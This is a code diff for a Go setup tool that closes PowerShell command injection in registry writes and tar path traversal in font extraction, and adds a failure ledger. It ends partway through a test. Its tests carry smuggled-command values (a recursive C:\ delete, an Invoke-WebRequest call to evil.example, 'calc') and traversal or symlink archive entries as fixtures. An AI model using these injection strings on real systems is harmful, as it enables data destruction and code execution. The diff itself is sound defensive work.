 		}
 
 		if strings.TrimSpace(string(output)) != "true" {
-			log.Warnf("GSetting is not writable - Schema: %s, Key: %s, Value: %v", config.Schema, key, value)
+			recordFailure("configuration", config.Schema+"."+key, errors.New("gsetting is not writable"))
 			continue
 		}
 
@@ -123,7 +137,11 @@ func processGSettings(config types.Configuration) error {
 		cmd := exec.Command("gsettings", args...) // #nosec G204 -- argv, not a shell string: schema/key/value are passed as discrete arguments
 		output, err = cmd.CombinedOutput()
 		if err != nil {
-			log.Errorf("Error applying gsettings configuration - Schema: %s, Key: %s, Value: %s, Error: %v, Output: %s", config.Schema, key, strValue, err, string(output))
+			// Every failure here used to be logged and then discarded: this
+			// function returned nil unconditionally, so a run in which no setting
+			// applied still reported success.
+			recordFailure("configuration", config.Schema+"."+key,
+				fmt.Errorf("applying value %s: %v (%s)", strValue, err, strings.TrimSpace(string(output))))
 		} else {
 			log.Debugf("Successfully applied gsettings - Schema: %s, Key: %s, Value: %s", config.Schema, key, strValue)
 		}
@@ -186,45 +204,155 @@ func processMacOSDefaults(config types.Configuration, initConfig *types.InitConf
 	return nil
 }
 
+// Environment variables carrying the registry path, name and value into the
+// PowerShell script body. See processWindowsRegistry for why they exist.
+const (
+	registryPathEnv  = "RWR_REGISTRY_PATH"
+	registryNameEnv  = "RWR_REGISTRY_NAME"
+	registryValueEnv = "RWR_REGISTRY_VALUE"
+)
+
+// registryScripts maps a blueprint registry type to the PowerShell body used to
+// write it. Each body is a compile-time constant that only ever reads its inputs
+// from $env:, so nothing a blueprint supplies is ever parsed as PowerShell.
+var registryScripts = map[string]string{
+	"string":       `Set-ItemProperty -LiteralPath $env:` + registryPathEnv + ` -Name $env:` + registryNameEnv + ` -Value $env:` + registryValueEnv + ` -Type String`,
+	"expandstring": `Set-ItemProperty -LiteralPath $env:` + registryPathEnv + ` -Name $env:` + registryNameEnv + ` -Value $env:` + registryValueEnv + ` -Type ExpandString`,
+	"binary":       `Set-ItemProperty -LiteralPath $env:` + registryPathEnv + ` -Name $env:` + registryNameEnv + ` -Value ([byte[]]($env:` + registryValueEnv + ` -split ',' | ForEach-Object { [byte]$_ })) -Type Binary`,
+	"dword":        `Set-ItemProperty -LiteralPath $env:` + registryPathEnv + ` -Name $env:` + registryNameEnv + ` -Value ([int32]$env:` + registryValueEnv + `) -Type DWord`,
+	"qword":        `Set-ItemProperty -LiteralPath $env:` + registryPathEnv + ` -Name $env:` + registryNameEnv + ` -Value ([int64]$env:` + registryValueEnv + `) -Type QWord`,
+}
+
+// processWindowsRegistry writes a single registry value through PowerShell.
+//
+// The path, name and value are blueprint-supplied and are passed as environment
+// variables rather than interpolated into the -Command string. PowerShell tokenizes
+// whatever follows -Command, so a value such as `a'; Remove-Item C:\ -Recurse; #`
+// used to close the surrounding quote and run as a second statement; $env: lookups
+// are values, never re-parsed as code. For the same reason there is no
+// `Start-Process -Verb RunAs -ArgumentList "-Command ..."` branch any more — that
+// re-tokenized the already-built string a second time. Windows elevation follows
+// the same rule as every other command in rwr: the process must already be
+// elevated (see system.buildCommand).
 func processWindowsRegistry(config types.Configuration, initConfig *types.InitConfig) error {
-	var psCommand string
-	switch strings.ToLower(config.Type) {
-	case "string":
-		psCommand = fmt.Sprintf("Set-ItemProperty -Path 'HKLM:\\%s' -Name '%s' -Value '%s' -Type String", config.Path, config.Key, config.Value)
-	case "expandstring":
-		psCommand = fmt.Sprintf("Set-ItemProperty -Path 'HKLM:\\%s' -Name '%s' -Value '%s' -Type ExpandString", config.Path, config.Key, config.Value)
-	case "binary":
-		// For binary, we'll need to convert the []byte to a comma-separated string
-		byteSlice, ok := config.Value.([]byte)
-		if !ok {
-			return fmt.Errorf("invalid binary value for registry key")
-		}
-		byteString := strings.Trim(strings.Join(strings.Fields(fmt.Sprintf("%d", byteSlice)), ","), "[]")
-		psCommand = fmt.Sprintf("Set-ItemProperty -Path 'HKLM:\\%s' -Name '%s' -Value ([byte[]]@(%s)) -Type Binary", config.Path, config.Key, byteString)
-	case "dword":
-		psCommand = fmt.Sprintf("Set-ItemProperty -Path 'HKLM:\\%s' -Name '%s' -Value %d -Type DWord", config.Path, config.Key, config.Value)
-	case "qword":
-		psCommand = fmt.Sprintf("Set-ItemProperty -Path 'HKLM:\\%s' -Name '%s' -Value %d -Type QWord", config.Path, config.Key, config.Value)
-	default:
+	regType := strings.ToLower(config.Type)
+	script, ok := registryScripts[regType]
+	if !ok {
 		return fmt.Errorf("unsupported registry value type: %s", config.Type)
+	}
+
+	value, err := registryValueString(regType, config.Value)
+	if err != nil {
+		return err
 	}
 
 	cmd := types.Command{
 		Exec:     "powershell",
-		Args:     []string{"-Command", psCommand},
+		Args:     []string{"-NoProfile", "-NonInteractive", "-Command", script},
 		Elevated: config.Elevated,
+		Variables: map[string]string{
+			registryPathEnv:  `HKLM:\` + config.Path,
+			registryNameEnv:  config.Key,
+			registryValueEnv: value,
+		},
 	}
 
-	if config.Elevated {
-		// For elevated privileges, we need to run PowerShell as administrator
-		cmd.Args = []string{"-Command", "Start-Process", "powershell", "-Verb", "RunAs", "-ArgumentList", fmt.Sprintf("-Command %s", psCommand)}
-	}
-
-	err := system.RunCommand(cmd, initConfig.Variables.Flags.Debug)
-
-	if err != nil {
+	if err := system.RunCommand(cmd, initConfig.Variables.Flags.Debug); err != nil {
 		return fmt.Errorf("error applying Windows registry configuration: %w", err)
 	}
 
 	return nil
+}
+
+// registryValueString renders a blueprint value for the environment variable the
+// PowerShell body reads. Numeric types are validated here so a YAML string lands as
+// a named error instead of reaching the registry as the literal text
+// "%!d(string=...)", which is what fmt produced when %d was handed a string.
+func registryValueString(regType string, value interface{}) (string, error) {
+	switch regType {
+	case "dword", "qword":
+		n, err := registryInt(value)
+		if err != nil {
+			return "", fmt.Errorf("invalid %s registry value %v: %w", regType, value, err)
+		}
+		return strconv.FormatInt(n, 10), nil
+	case "binary":
+		bytes, err := registryBytes(value)
+		if err != nil {
+			return "", fmt.Errorf("invalid binary registry value: %w", err)
+		}
+		parts := make([]string, len(bytes))
+		for i, b := range bytes {
+			parts[i] = strconv.FormatUint(uint64(b), 10)
+		}
+		return strings.Join(parts, ","), nil
+	default:
+		if value == nil {
+			return "", nil
+		}
+		s, ok := value.(string)
+		if !ok {
+			return "", fmt.Errorf("invalid %s registry value: expected a string, got %T", regType, value)
+		}
+		return s, nil
+	}
+}
+
+func registryInt(value interface{}) (int64, error) {
+	switch v := value.(type) {
+	case int:
+		return int64(v), nil
+	case int32:
+		return int64(v), nil
+	case int64:
+		return v, nil
+	case uint:
+		if v > math.MaxInt64 {
+			return 0, fmt.Errorf("value %d is too large for a registry integer", v)
+		}
+		return int64(v), nil
+	case uint32:
+		return int64(v), nil
+	case uint64:
+		if v > math.MaxInt64 {
+			return 0, fmt.Errorf("value %d is too large for a registry integer", v)
+		}
+		return int64(v), nil
+	case float64:
+		// JSON and some YAML decoders hand back every number as a float64.
+		if v != float64(int64(v)) {
+			return 0, fmt.Errorf("not a whole number")
+		}
+		return int64(v), nil
+	case string:
+		n, err := strconv.ParseInt(strings.TrimSpace(v), 0, 64)
+		if err != nil {
+			return 0, fmt.Errorf("not an integer")
+		}
+		return n, nil
+	default:
+		return 0, fmt.Errorf("expected an integer, got %T", value)
+	}
+}
+
+func registryBytes(value interface{}) ([]byte, error) {
+	switch v := value.(type) {
+	case []byte:
+		return v, nil
+	case []interface{}:
+		out := make([]byte, 0, len(v))
+		for _, elem := range v {
+			n, err := registryInt(elem)
+			if err != nil {
+				return nil, err
+			}
+			if n < 0 || n > 255 {
+				return nil, fmt.Errorf("byte value %d out of range", n)
+			}
+			out = append(out, byte(n))
+		}
+		return out, nil
+	default:
+		return nil, fmt.Errorf("expected a byte sequence, got %T", value)
+	}
 }

--- a/internal/processors/configuration_injection_test.go
+++ b/internal/processors/configuration_injection_test.go
@@ -1,0 +1,193 @@
+package processors
+
+import (
+	"strings"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/exectest"
+	"github.com/fynxlabs/rwr/internal/system"
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+// Registry values come from a blueprint. Anything interpolated into the string
+// PowerShell parses after -Command is a second statement waiting to happen, so the
+// argv must stay a fixed script and carry the data out-of-band.
+func TestProcessWindowsRegistry_ValuesNeverReachTheCommandString(t *testing.T) {
+	tests := []struct {
+		name      string
+		config    types.Configuration
+		wantValue string
+	}{
+		{
+			name: "single quote and semicolon in value",
+			config: types.Configuration{
+				Type:  "string",
+				Path:  `SOFTWARE\rwr`,
+				Key:   "Setting",
+				Value: `a'; Remove-Item C:\ -Recurse -Force; #`,
+			},
+			wantValue: `a'; Remove-Item C:\ -Recurse -Force; #`,
+		},
+		{
+			name: "subexpression in value",
+			config: types.Configuration{
+				Type:  "expandstring",
+				Path:  `SOFTWARE\rwr`,
+				Key:   "Setting",
+				Value: `$(Invoke-WebRequest evil.example)`,
+			},
+			wantValue: `$(Invoke-WebRequest evil.example)`,
+		},
+		{
+			name: "injection through the key name",
+			config: types.Configuration{
+				Type:  "string",
+				Path:  `SOFTWARE\rwr`,
+				Key:   `Name'; calc; #`,
+				Value: "ok",
+			},
+			wantValue: "ok",
+		},
+		{
+			name: "injection through the registry path",
+			config: types.Configuration{
+				Type:  "string",
+				Path:  `SOFTWARE\rwr'; calc; #`,
+				Key:   "Setting",
+				Value: "ok",
+			},
+			wantValue: "ok",
+		},
+		{
+			name: "dword given as a string still lands as a number",
+			config: types.Configuration{
+				Type:  "dword",
+				Path:  `SOFTWARE\rwr`,
+				Key:   "Setting",
+				Value: "42",
+			},
+			wantValue: "42",
+		},
+		{
+			name: "qword given as a yaml integer",
+			config: types.Configuration{
+				Type:  "qword",
+				Path:  `SOFTWARE\rwr`,
+				Key:   "Setting",
+				Value: 7,
+			},
+			wantValue: "7",
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			rec := exectest.New()
+			defer system.SetExecutor(rec)()
+
+			if err := processWindowsRegistry(tt.config, &types.InitConfig{}); err != nil {
+				t.Fatalf("processWindowsRegistry: %v", err)
+			}
+
+			if len(rec.Calls) != 1 {
+				t.Fatalf("recorded %d calls, want 1: %v", len(rec.Calls), rec.Calls)
+			}
+			call := rec.Calls[0]
+
+			if call.Exec != "powershell" {
+				t.Errorf("Exec = %q, want powershell", call.Exec)
+			}
+
+			// The blueprint data must appear only in the environment, never in argv.
+			for _, arg := range call.Args {
+				for _, tainted := range []string{tt.config.Path, tt.config.Key} {
+					if strings.Contains(arg, tainted) {
+						t.Errorf("argv element %q contains blueprint input %q", arg, tainted)
+					}
+				}
+				if s, ok := tt.config.Value.(string); ok && strings.Contains(arg, s) {
+					t.Errorf("argv element %q contains blueprint value %q", arg, s)
+				}
+			}
+
+			// Nothing may re-parse an already-built command string.
+			for _, arg := range call.Args {
+				if strings.Contains(arg, "Start-Process") {
+					t.Errorf("argv still nests through Start-Process: %v", call.Args)
+				}
+			}
+
+			if got := call.Vars[registryValueEnv]; got != tt.wantValue {
+				t.Errorf("%s = %q, want %q", registryValueEnv, got, tt.wantValue)
+			}
+			if got, want := call.Vars[registryNameEnv], tt.config.Key; got != want {
+				t.Errorf("%s = %q, want %q", registryNameEnv, got, want)
+			}
+			if got, want := call.Vars[registryPathEnv], `HKLM:\`+tt.config.Path; got != want {
+				t.Errorf("%s = %q, want %q", registryPathEnv, got, want)
+			}
+		})
+	}
+}
+
+// The elevated path used to wrap the whole command in
+// `Start-Process -Verb RunAs -ArgumentList "-Command <string>"`, which handed the
+// interpolated string to a second parser.
+func TestProcessWindowsRegistry_ElevatedDoesNotRebuildACommandString(t *testing.T) {
+	rec := exectest.New()
+	defer system.SetExecutor(rec)()
+
+	config := types.Configuration{
+		Type:     "string",
+		Path:     `SOFTWARE\rwr`,
+		Key:      "Setting",
+		Value:    `a'; calc; #`,
+		Elevated: true,
+	}
+	if err := processWindowsRegistry(config, &types.InitConfig{}); err != nil {
+		t.Fatalf("processWindowsRegistry: %v", err)
+	}
+
+	call := rec.Calls[0]
+	if !call.Elevated {
+		t.Error("Elevated = false, want true")
+	}
+	joined := strings.Join(call.Argv(), " ")
+	if strings.Contains(joined, "Start-Process") || strings.Contains(joined, "calc") {
+		t.Errorf("elevated argv leaks blueprint input or re-parses a command string: %v", call.Argv())
+	}
+}
+
+// %d against a YAML string used to write the literal text "%!d(string=high)" into
+// the registry instead of failing.
+func TestProcessWindowsRegistry_RejectsBadValues(t *testing.T) {
+	tests := []struct {
+		name   string
+		config types.Configuration
+	}{
+		{"non-numeric dword", types.Configuration{Type: "dword", Key: "k", Value: "high"}},
+		{"non-numeric qword", types.Configuration{Type: "qword", Key: "k", Value: "high"}},
+		{"fractional dword", types.Configuration{Type: "dword", Key: "k", Value: 1.5}},
+		{"non-string string value", types.Configuration{Type: "string", Key: "k", Value: 12}},
+		{"binary from a string", types.Configuration{Type: "binary", Key: "k", Value: "nope"}},
+		{"unsupported type", types.Configuration{Type: "reg_none", Key: "k", Value: "x"}},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			rec := exectest.New()
+			defer system.SetExecutor(rec)()
+
+			err := processWindowsRegistry(tt.config, &types.InitConfig{})
+			if err == nil {
+				t.Fatal("expected an error, got nil")
+			}
+			if strings.Contains(err.Error(), "%!") {
+				t.Errorf("error still carries a fmt verb failure: %v", err)
+			}
+			if len(rec.Calls) != 0 {
+				t.Errorf("ran a command despite the invalid value: %v", rec.Calls)
+			}
+		})
+	}
+}

--- a/internal/processors/failures.go
+++ b/internal/processors/failures.go
@@ -1,0 +1,74 @@
+package processors
+
+import (
+	"fmt"
+	"strings"
+	"sync"
+
+	"charm.land/log/v2"
+)
+
+// Several processors deliberately keep going when one item fails: a package that
+// is not in the repositories should not stop the twenty after it, and a git repo
+// that is temporarily unreachable should not abandon the rest of the run. That is
+// the right behavior. What was wrong is that those failures then vanished — they
+// were logged and the run exited 0 with "RWR Run Complete!", so a run in which
+// every single package failed to install was indistinguishable from a clean one.
+//
+// The ledger records them instead. Processors keep going and keep logging; All()
+// asks at the end whether anything failed and returns a non-nil error if so, which
+// is what puts it in the exit code.
+type runFailures struct {
+	mu    sync.Mutex
+	items []runFailure
+}
+
+type runFailure struct {
+	component string
+	subject   string
+	err       error
+}
+
+var failures runFailures
+
+// recordFailure notes a non-fatal failure and logs it. Call it instead of a bare
+// log.Warnf/log.Errorf wherever a processor swallows an error and continues.
+func recordFailure(component, subject string, err error) {
+	failures.mu.Lock()
+	failures.items = append(failures.items, runFailure{component: component, subject: subject, err: err})
+	failures.mu.Unlock()
+
+	log.Errorf("%s: %s: %v", component, subject, err)
+}
+
+// resetFailures clears the ledger at the start of a run.
+func resetFailures() {
+	failures.mu.Lock()
+	failures.items = nil
+	failures.mu.Unlock()
+}
+
+// failureCount reports how many non-fatal failures the run has accumulated.
+func failureCount() int {
+	failures.mu.Lock()
+	defer failures.mu.Unlock()
+	return len(failures.items)
+}
+
+// failureError summarizes the ledger as a single error, or nil when the run was
+// clean. The summary lists every failure so the exit code is not the only signal.
+func failureError() error {
+	failures.mu.Lock()
+	defer failures.mu.Unlock()
+
+	if len(failures.items) == 0 {
+		return nil
+	}
+
+	var b strings.Builder
+	fmt.Fprintf(&b, "%d operation(s) failed:", len(failures.items))
+	for _, item := range failures.items {
+		fmt.Fprintf(&b, "\n  - %s: %s: %v", item.component, item.subject, item.err)
+	}
+	return fmt.Errorf("%s", b.String())
+}

--- a/internal/processors/failures_test.go
+++ b/internal/processors/failures_test.go
@@ -1,0 +1,53 @@
+package processors
+
+import (
+	"errors"
+	"strings"
+	"testing"
+)
+
+func TestFailureLedger_CleanRunReportsNoError(t *testing.T) {
+	resetFailures()
+
+	if got := failureCount(); got != 0 {
+		t.Fatalf("fresh ledger has %d failures, want 0", got)
+	}
+	if err := failureError(); err != nil {
+		t.Errorf("clean run returned %v, want nil", err)
+	}
+}
+
+// The failure this guards against: every package fails to install, each one is
+// logged and skipped, and the run still exits 0.
+func TestFailureLedger_RecordedFailuresSurface(t *testing.T) {
+	resetFailures()
+	t.Cleanup(resetFailures)
+
+	recordFailure("packages", "git", errors.New("not found in repositories"))
+	recordFailure("ssh_keys", "id_ed25519", errors.New("permission denied"))
+
+	if got := failureCount(); got != 2 {
+		t.Fatalf("ledger recorded %d failures, want 2", got)
+	}
+
+	err := failureError()
+	if err == nil {
+		t.Fatal("recorded failures produced a nil error")
+	}
+
+	for _, want := range []string{"2 operation(s) failed", "packages", "git", "not found in repositories", "ssh_keys", "id_ed25519", "permission denied"} {
+		if !strings.Contains(err.Error(), want) {
+			t.Errorf("summary is missing %q:\n%s", want, err)
+		}
+	}
+}
+
+func TestFailureLedger_ResetClearsPreviousRun(t *testing.T) {
+	resetFailures()
+	recordFailure("packages", "vim", errors.New("boom"))
+	resetFailures()
+
+	if err := failureError(); err != nil {
+		t.Errorf("reset ledger still reports %v", err)
+	}
+}

--- a/internal/processors/fonts.go
+++ b/internal/processors/fonts.go
@@ -58,15 +58,12 @@ func ProcessFonts(blueprintData []byte, blueprintDir string, format string, osIn
 		return fmt.Errorf("error unmarshaling fonts blueprint data: %w", err)
 	}
 
+	fontsData.Fonts = helpers.FilterByProfiles(fontsData.Fonts, initConfig.Variables.Flags.Profiles)
+
 	log.Debugf("Found %d font entries to process", len(fontsData.Fonts))
 
-	releaseURL, err := getLatestReleaseURL()
-	if err != nil {
-		return fmt.Errorf("error getting latest release URL: %w", err)
-	}
-
-	for _, font := range fontsData.Fonts {
-		if system.IsDryRun() {
+	if system.IsDryRun() {
+		for _, font := range fontsData.Fonts {
 			if len(font.Names) > 0 {
 				for _, name := range font.Names {
 					log.Infof("[DRY-RUN] Would install font: %s", name)
@@ -74,8 +71,22 @@ func ProcessFonts(blueprintData []byte, blueprintDir string, format string, osIn
 			} else if font.Name != "" {
 				log.Infof("[DRY-RUN] Would install font: %s", font.Name)
 			}
-			continue
 		}
+		return nil
+	}
+
+	if len(fontsData.Fonts) == 0 {
+		return nil
+	}
+
+	// Resolved after the dry-run and empty-blueprint exits: this is a network call,
+	// and `--dry-run` is expected to work offline.
+	releaseURL, err := getLatestReleaseURL()
+	if err != nil {
+		return fmt.Errorf("error getting latest release URL: %w", err)
+	}
+
+	for _, font := range fontsData.Fonts {
 		if len(font.Names) > 0 {
 			for _, name := range font.Names {
 				fontWithName := font
@@ -117,6 +128,10 @@ func processFont(font types.Font, osInfo *types.OSInfo, releaseURL string) error
 func installFont(font types.Font, osInfo *types.OSInfo, releaseURL string) error {
 	log.Infof("Installing font: %s", font.Name)
 
+	if err := validateFontName(font.Name); err != nil {
+		return err
+	}
+
 	fontURL := getFontURL(font, releaseURL)
 	log.Debugf("Font URL: %s", fontURL)
 
@@ -133,7 +148,7 @@ func installFont(font types.Font, osInfo *types.OSInfo, releaseURL string) error
 	}
 
 	fontDir := getFontDirectory(font.Location, osInfo)
-	err = extractFontTarball(tarballPath, fontDir, osInfo)
+	err = extractFontTarball(tarballPath, fontDir, font.Location == "system", osInfo)
 	if err != nil {
 		return fmt.Errorf("error extracting font tarball: %v", err)
 	}
@@ -148,6 +163,10 @@ func installFont(font types.Font, osInfo *types.OSInfo, releaseURL string) error
 
 func removeFont(font types.Font, osInfo *types.OSInfo) error {
 	log.Infof("Removing font: %s", font.Name)
+
+	if err := validateFontName(font.Name); err != nil {
+		return err
+	}
 
 	fontDir := getFontDirectory(font.Location, osInfo)
 	fontPattern := filepath.Join(fontDir, font.Name+"*.ttf")
@@ -171,6 +190,21 @@ func removeFont(font types.Font, osInfo *types.OSInfo) error {
 	return nil
 }
 
+// validateFontName rejects names that would escape the release they are meant to
+// name. font.Name is blueprint-supplied and is concatenated straight into the
+// nerd-fonts download URL and into the local font path, so "../../owner/repo/x"
+// would both redirect the download to an attacker-chosen release and, on removal,
+// glob outside the font directory.
+func validateFontName(name string) error {
+	if name == "" {
+		return fmt.Errorf("font name is empty")
+	}
+	if strings.ContainsAny(name, "/\\") || strings.Contains(name, "..") {
+		return fmt.Errorf("invalid font name %q: must not contain path separators or %q", name, "..")
+	}
+	return nil
+}
+
 func getFontURL(font types.Font, releaseURL string) string {
 	return fmt.Sprintf("%s%s.tar.xz", releaseURL, font.Name)
 }
@@ -182,6 +216,12 @@ func downloadFontTarball(url, filepath string) error {
 	}
 	defer resp.Body.Close() //nolint:errcheck
 
+	// Without this the error page body is written out as a .tar.xz and the failure
+	// only surfaces later as an unintelligible decompression error.
+	if resp.StatusCode != http.StatusOK {
+		return fmt.Errorf("downloading %s: unexpected status %s", url, resp.Status)
+	}
+
 	out, err := os.Create(filepath) // #nosec G304 -- path is operator-supplied blueprint/config input; containment added in PR8
 	if err != nil {
 		return err
@@ -192,7 +232,35 @@ func downloadFontTarball(url, filepath string) error {
 	return err
 }
 
-func extractFontTarball(tarballPath, destDir string, osInfo *types.OSInfo) error {
+// resolveTarEntryPath joins a tar entry name onto destDir and refuses anything that
+// would land outside it. Archive entry names are attacker-controlled data: a member
+// named "../../../etc/cron.d/x" otherwise resolves through filepath.Join to a real
+// path outside the font directory, which rwr then writes — as root, for a
+// system-scoped install.
+func resolveTarEntryPath(destDir, name string) (string, error) {
+	if name == "" {
+		return "", fmt.Errorf("tar entry has an empty name")
+	}
+	// Tar always uses forward slashes; check both so a Windows-style name is not
+	// waved through on a platform where filepath.Join treats "\" as a separator.
+	cleaned := filepath.Clean(filepath.FromSlash(name))
+	if filepath.IsAbs(cleaned) || strings.HasPrefix(name, "/") {
+		return "", fmt.Errorf("tar entry %q is an absolute path", name)
+	}
+
+	targetPath := filepath.Join(destDir, cleaned)
+	rel, err := filepath.Rel(destDir, targetPath)
+	if err != nil {
+		return "", fmt.Errorf("tar entry %q is outside the destination directory: %w", name, err)
+	}
+	if rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) || filepath.IsAbs(rel) {
+		return "", fmt.Errorf("tar entry %q escapes the destination directory", name)
+	}
+
+	return targetPath, nil
+}
+
+func extractFontTarball(tarballPath, destDir string, elevated bool, osInfo *types.OSInfo) error {
 	file, err := os.Open(tarballPath) // #nosec G304 -- path is operator-supplied blueprint/config input; containment added in PR8
 	if err != nil {
 		return err
@@ -216,8 +284,18 @@ func extractFontTarball(tarballPath, destDir string, osInfo *types.OSInfo) error
 			return err
 		}
 
+		// Links are never needed to install a font and are the cheapest way to make a
+		// later write land outside destDir, so they are dropped rather than resolved.
+		if header.Typeflag == tar.TypeSymlink || header.Typeflag == tar.TypeLink {
+			log.Warnf("Skipping link entry in font archive: %s", header.Name)
+			continue
+		}
+
 		if header.Typeflag == tar.TypeReg && strings.HasSuffix(header.Name, ".ttf") {
-			targetPath := filepath.Join(destDir, header.Name) // #nosec G305 -- TODO(PR8): bound tar entry paths to destination dir
+			targetPath, err := resolveTarEntryPath(destDir, header.Name)
+			if err != nil {
+				return fmt.Errorf("error extracting font archive: %w", err)
+			}
 
 			// Create a temporary file for the extracted font
 			tempFile, err := os.CreateTemp("", "font-")
@@ -246,7 +324,9 @@ func extractFontTarball(tarballPath, destDir string, osInfo *types.OSInfo) error
 			if tempFile == nil || targetPath == "" {
 				return fmt.Errorf("invalid arguments: tempFile or targetPath is nil/empty")
 			}
-			err = system.CopyFile(tempFile.Name(), targetPath, true, osInfo)
+			// Elevated only for a system-scoped install; a user font goes under $HOME
+			// and needs no privilege.
+			err = system.CopyFile(tempFile.Name(), targetPath, elevated, osInfo)
 			if err != nil {
 				return fmt.Errorf("error copying font file to destination: %v", err)
 			}

--- a/internal/processors/fonts_extract_test.go
+++ b/internal/processors/fonts_extract_test.go
@@ -1,0 +1,297 @@
+package processors
+
+import (
+	"archive/tar"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/exectest"
+	"github.com/fynxlabs/rwr/internal/system"
+	"github.com/fynxlabs/rwr/internal/types"
+	"github.com/ulikunitz/xz"
+)
+
+type tarEntry struct {
+	name     string
+	typeflag byte
+	body     string
+	linkname string
+}
+
+// writeFontTarball builds a .tar.xz in the shape extractFontTarball expects, so a
+// test can hand it entry names a real archive would never contain.
+func writeFontTarball(t *testing.T, path string, entries []tarEntry) {
+	t.Helper()
+
+	f, err := os.Create(path)
+	if err != nil {
+		t.Fatalf("creating tarball: %v", err)
+	}
+	defer f.Close() //nolint:errcheck
+
+	xzw, err := xz.NewWriter(f)
+	if err != nil {
+		t.Fatalf("creating xz writer: %v", err)
+	}
+	tw := tar.NewWriter(xzw)
+
+	for _, e := range entries {
+		typeflag := e.typeflag
+		if typeflag == 0 {
+			typeflag = tar.TypeReg
+		}
+		hdr := &tar.Header{
+			Name:     e.name,
+			Typeflag: typeflag,
+			Linkname: e.linkname,
+			Mode:     0o644,
+			Size:     int64(len(e.body)),
+		}
+		if typeflag != tar.TypeReg {
+			hdr.Size = 0
+		}
+		if err := tw.WriteHeader(hdr); err != nil {
+			t.Fatalf("writing tar header %q: %v", e.name, err)
+		}
+		if hdr.Size > 0 {
+			if _, err := tw.Write([]byte(e.body)); err != nil {
+				t.Fatalf("writing tar body %q: %v", e.name, err)
+			}
+		}
+	}
+
+	if err := tw.Close(); err != nil {
+		t.Fatalf("closing tar writer: %v", err)
+	}
+	if err := xzw.Close(); err != nil {
+		t.Fatalf("closing xz writer: %v", err)
+	}
+}
+
+func fontOSInfo() *types.OSInfo {
+	osInfo := &types.OSInfo{}
+	osInfo.System.OS = "linux"
+	return osInfo
+}
+
+// Entry names in a downloaded archive are attacker-controlled: joining them onto
+// the font directory without a containment check lets a member escape it, and for a
+// system-scoped install that write happens as root.
+func TestExtractFontTarball_RejectsEntriesEscapingDestDir(t *testing.T) {
+	tests := []struct {
+		name  string
+		entry string
+	}{
+		{"parent traversal", "../../evil.ttf"},
+		{"single parent", "../evil.ttf"},
+		{"traversal below a subdirectory", "fonts/../../../evil.ttf"},
+		{"absolute path", "/tmp/rwr-evil.ttf"},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			rec := exectest.New()
+			defer system.SetExecutor(rec)()
+
+			root := t.TempDir()
+			destDir := filepath.Join(root, "nested", "fonts")
+			if err := os.MkdirAll(destDir, 0o750); err != nil {
+				t.Fatalf("mkdir: %v", err)
+			}
+			tarballPath := filepath.Join(root, "font.tar.xz")
+			writeFontTarball(t, tarballPath, []tarEntry{{name: tt.entry, body: "ttf-bytes"}})
+
+			err := extractFontTarball(tarballPath, destDir, false, fontOSInfo())
+			if err == nil {
+				t.Fatal("expected extraction to fail, got nil")
+			}
+
+			// Nothing may have been written anywhere under the temp root, and in
+			// particular not outside destDir.
+			assertNoFileOutside(t, root, destDir, "evil.ttf")
+			if _, statErr := os.Stat("/tmp/rwr-evil.ttf"); statErr == nil {
+				t.Fatal("absolute entry escaped to /tmp/rwr-evil.ttf")
+			}
+		})
+	}
+}
+
+// Links can point anywhere; installing a font never needs one, so they are dropped
+// rather than followed.
+func TestExtractFontTarball_SkipsLinkEntries(t *testing.T) {
+	rec := exectest.New()
+	defer system.SetExecutor(rec)()
+
+	root := t.TempDir()
+	destDir := filepath.Join(root, "fonts")
+	if err := os.MkdirAll(destDir, 0o750); err != nil {
+		t.Fatalf("mkdir: %v", err)
+	}
+	tarballPath := filepath.Join(root, "font.tar.xz")
+	writeFontTarball(t, tarballPath, []tarEntry{
+		{name: "escape.ttf", typeflag: tar.TypeSymlink, linkname: "/etc/passwd"},
+		{name: "hard.ttf", typeflag: tar.TypeLink, linkname: "../../outside.ttf"},
+	})
+
+	if err := extractFontTarball(tarballPath, destDir, false, fontOSInfo()); err != nil {
+		t.Fatalf("extractFontTarball: %v", err)
+	}
+
+	entries, err := os.ReadDir(destDir)
+	if err != nil {
+		t.Fatalf("reading destDir: %v", err)
+	}
+	if len(entries) != 0 {
+		t.Errorf("destDir is not empty: %v", entries)
+	}
+}
+
+// A user-scoped install writes under $HOME and must not ask for privilege; only
+// location "system" may.
+func TestExtractFontTarball_ElevatesOnlyWhenAsked(t *testing.T) {
+	tests := []struct {
+		name     string
+		elevated bool
+	}{
+		{"user scoped", false},
+		{"system scoped", true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			rec := exectest.New()
+			defer system.SetExecutor(rec)()
+
+			root := t.TempDir()
+			destDir := filepath.Join(root, "fonts")
+			if err := os.MkdirAll(destDir, 0o750); err != nil {
+				t.Fatalf("mkdir: %v", err)
+			}
+			tarballPath := filepath.Join(root, "font.tar.xz")
+			writeFontTarball(t, tarballPath, []tarEntry{{name: "Good.ttf", body: "ttf-bytes"}})
+
+			if err := extractFontTarball(tarballPath, destDir, tt.elevated, fontOSInfo()); err != nil {
+				t.Fatalf("extractFontTarball: %v", err)
+			}
+
+			// system.CopyFile shells out only for the elevated copy, so a recorded
+			// call is the observable difference between the two scopes.
+			if tt.elevated && len(rec.Calls) == 0 {
+				t.Error("system-scoped install did not request elevation")
+			}
+			if !tt.elevated {
+				if len(rec.Calls) != 0 {
+					t.Errorf("user-scoped install ran privileged commands: %v", rec.Calls)
+				}
+				if _, err := os.Stat(filepath.Join(destDir, "Good.ttf")); err != nil {
+					t.Errorf("font was not written to destDir: %v", err)
+				}
+			}
+		})
+	}
+}
+
+func TestResolveTarEntryPath(t *testing.T) {
+	destDir := filepath.Join(string(filepath.Separator), "tmp", "rwr-fonts")
+
+	tests := []struct {
+		name    string
+		entry   string
+		want    string
+		wantErr bool
+	}{
+		{name: "plain name", entry: "Good.ttf", want: filepath.Join(destDir, "Good.ttf")},
+		{name: "nested name", entry: "sub/Good.ttf", want: filepath.Join(destDir, "sub", "Good.ttf")},
+		{name: "dot prefixed", entry: "./Good.ttf", want: filepath.Join(destDir, "Good.ttf")},
